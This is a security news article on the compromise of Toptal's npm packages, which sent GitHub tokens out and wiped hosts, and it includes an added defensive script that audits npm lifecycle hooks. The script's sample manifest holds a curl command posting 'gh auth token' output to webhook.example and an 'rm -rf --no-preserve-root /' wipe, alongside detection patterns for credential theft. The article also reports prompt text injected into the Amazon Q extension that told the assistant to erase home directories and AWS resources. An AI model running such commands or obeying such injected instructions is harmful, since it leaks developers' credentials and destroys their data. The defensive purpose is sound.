In a recent supply-chain incident, attackers gained control of Toptal’s GitHub organization account and used that access to publish ten malicious npm packages designed to exfiltrate GitHub authentication tokens and wipe the machines they were installed on. A report from Socket found that 73 repositories linked to Toptal were exposed as a result of the breach.
The malicious packages included:
- @toptal/picasso-tailwind
- @toptal/picasso-charts
- @toptal/picasso-shared
- @toptal/picasso-provider
- @toptal/picasso-select
- @toptal/picasso-quote
- @toptal/picasso-forms
- @xene/core
- @toptal/picasso-utils
- @toptal/picasso-typograph
Each of these Node.js packages carried the same malicious payload in its package.json file, and together they accumulated around 5,000 downloads before being removed from the npm registry.
The payload lived in the packages’ preinstall and postinstall lifecycle scripts, which npm runs automatically on the developer’s machine during installation. The scripts sent the developer’s GitHub authentication token to a webhook endpoint and then attempted to delete every directory and file on the host, with commands for both Windows and Linux.
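Because the damage is done by lifecycle hooks that npm runs without asking, the practical check is to look at those hooks before they execute. The script below is an added example, not code from the article, from Socket, or from Toptal: it reads package.json manifests, reports every install-time hook, and flags the patterns seen in this incident (token access, an outbound request, a recursive delete). The sample manifests, the command strings in them, and the hostname webhook.example are constructed for illustration and are not the real payload.

```javascript
// Added example, not code from the article, Socket, or Toptal: a small audit script that
// reads package.json manifests and flags npm lifecycle scripts (preinstall/install/postinstall
// and friends) that npm would run automatically on a developer's machine during `npm install`.
// The sample manifests and the command strings in them are constructed for illustration and
// are not the real payload; the hostname webhook.example is a placeholder.

// Hooks npm runs on the consuming machine when a dependency is installed.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Heuristic indicators a reviewer would want to see before letting a hook run.
const INDICATORS = [
  { label: 'credential-access',
    re: /\bgh\s+auth\s+token\b|\.npmrc\b|_authToken|GITHUB_TOKEN|\.git-credentials|\.aws\/credentials/i },
  { label: 'network-exfil',
    re: /\b(curl|wget|Invoke-WebRequest)\b[^\n]*https?:\/\//i },
  { label: 'destructive',
    re: /\brm\s+-(rf|fr)\b|--no-preserve-root|\b(rd|rmdir)\s+\/s\b|Remove-Item\b[^\n]*-Recurse/i },
  { label: 'obfuscation',
    re: /base64\s+(-d|--decode)\b|\beval\s*\(|Buffer\.from\([^)]*base64/i },
];

// Return one finding per lifecycle hook present in the manifest, with matched indicator labels.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = INDICATORS.filter(i => i.re.test(command)).map(i => i.label);
    findings.push({ package: manifest.name, version: manifest.version, hook, command, indicators });
  }
  return findings;
}

// Collapse findings into a single risk label. A lifecycle hook with no indicator still
// deserves a look ('review'): node-gyp builds are common, but so are benign-looking droppers.
function riskLevel(findings) {
  const labels = new Set(findings.flatMap(f => f.indicators));
  if (labels.has('destructive') || (labels.has('credential-access') && labels.has('network-exfil'))) {
    return 'critical';
  }
  if (labels.size > 0) return 'suspicious';
  return findings.length > 0 ? 'review' : 'clean';
}

function auditAll(manifests) {
  return manifests.map(m => {
    const findings = auditManifest(m);
    return { package: m.name, version: m.version, risk: riskLevel(findings), findings };
  });
}

// Load every package.json one level under node_modules, including @scope/ packages.
// (require is resolved lazily so the heuristics above stay usable without filesystem access.)
function loadInstalledManifests(nodeModulesDir) {
  const fs = require('fs');
  const path = require('path');
  const manifests = [];
  for (const entry of fs.readdirSync(nodeModulesDir, { withFileTypes: true })) {
    if (!entry.isDirectory() || entry.name.startsWith('.')) continue;
    const dirs = entry.name.startsWith('@')
      ? fs.readdirSync(path.join(nodeModulesDir, entry.name)).map(s => path.join(entry.name, s))
      : [entry.name];
    for (const dir of dirs) {
      const file = path.join(nodeModulesDir, dir, 'package.json');
      if (fs.existsSync(file)) manifests.push(JSON.parse(fs.readFileSync(file, 'utf8')));
    }
  }
  return manifests;
}

// Constructed sample manifests (not real packages).
const SAMPLE_MANIFESTS = [
  // No lifecycle hooks at all: nothing runs on install.
  { name: 'good-lib', version: '1.0.0', scripts: { build: 'tsc -p .', test: 'node --test' } },
  // Legitimate native build: a hook runs, but without any of the indicators above.
  { name: 'native-addon', version: '2.3.1', scripts: { install: 'node-gyp rebuild' } },
  // Mirrors the behaviour the article describes: token sent to a webhook in preinstall,
  // then a recursive delete for Linux and Windows in postinstall.
  { name: '@example/compromised-ui', version: '0.0.1', scripts: {
      preinstall: 'curl -s -X POST -H "Content-Type: application/json" ' +
                  '-d "{\\"token\\": \\"$(gh auth token)\\"}" https://webhook.example/attacker',
      postinstall: 'sudo rm -rf --no-preserve-root / || rd /s /q .' } },
];

// Usage: `node audit-lifecycle.js path/to/node_modules`, or with no argument to run on the samples.
const target = process.argv[2];
const report = auditAll(target ? loadInstalledManifests(target) : SAMPLE_MANIFESTS);
for (const r of report) console.log(`${r.risk.padEnd(10)} ${r.package}@${r.version}`);
for (const r of report) for (const f of r.findings) console.log(`  ${f.hook}: [${f.indicators.join(', ')}] ${f.command}`);
```

The heuristics are deliberately simple and will miss an obfuscated or downloaded second stage, so treat a 'review' result as a prompt to read the hook, not as a clean bill of health. The stronger control is to stop npm from running hooks at all: set `ignore-scripts=true` in `.npmrc` (or `npm config set ignore-scripts true`) and run the few native builds you actually need explicitly, which turns a malicious preinstall into an inert string.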
At this time, the initial access vector has not been confirmed. Plausible scenarios include stolen credentials for an account in Toptal’s GitHub organization or an insider. The affected packages have since been restored to their last known-good versions, so anyone who installed one of the ten malicious versions should rotate the GitHub tokens that were present on the affected machine.
This breach follows another software supply chain incident involving the npm and PyPI registries, in which packages containing surveillanceware were discovered. That malware was capable of infiltrating developer machines, logging keystrokes, taking screenshots, accessing webcams, collecting system information, and stealing credentials.
The packages identified in that campaign, with their download counts at the time of reporting, were:
- dpsdatahub (npm) – 5,869 Downloads
- nodejs-backpack (npm) – 830 Downloads
- m0m0x01d (npm) – 37,847 Downloads
- vfunctions (PyPI) – 12,033 Downloads
These incidents underscore the ongoing challenges developers and organizations face in maintaining the integrity of open-source ecosystems, as malicious actors continue to exploit trust to introduce malware and spyware within development workflows.
Further escalating concerns, the Amazon Q extension for Visual Studio Code was also compromised: a release shipped with injected prompt text instructing the assistant to erase users’ home directories and AWS resources. A hacker claiming responsibility said they had submitted a pull request containing the destructive instructions and that it was accepted and merged into the codebase.
In a statement relating to this compromise, Amazon acknowledged the unauthorized modification aimed at the Q Developer CLI but assured that it did not impact any production services or end-users. After discovering the issue, the company immediately revoked and replaced the compromised credentials and removed the unapproved code from their system, releasing an updated version to mitigate the risk.